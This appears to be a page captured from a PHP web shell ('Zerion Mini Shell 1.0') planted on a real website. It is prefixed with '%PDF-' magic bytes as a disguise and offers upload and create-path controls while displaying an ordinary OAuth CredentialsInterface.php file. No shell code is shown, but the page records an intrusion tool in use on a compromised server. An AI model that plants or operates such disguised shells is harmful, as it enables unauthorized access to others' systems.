%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/paste.varak.net-5.6/vendor/lusitanian/OAuth/Common/Consumer/
Upload File :
Create Path :
Current File : /www/varak.net/paste.varak.net-5.6/vendor/lusitanian/OAuth/Common/Consumer/CredentialsInterface.php

<?php

namespace OAuth\Common\Consumer;

/**
 * Credentials Interface, credentials should implement this.
 */
interface CredentialsInterface
{
    /**
     * @return string
     */
    public function getCallbackUrl();

    /**
     * @return string
     */
    public function getConsumerId();

    /**
     * @return string
     */
    public function getConsumerSecret();
}

Zerion Mini Shell 1.0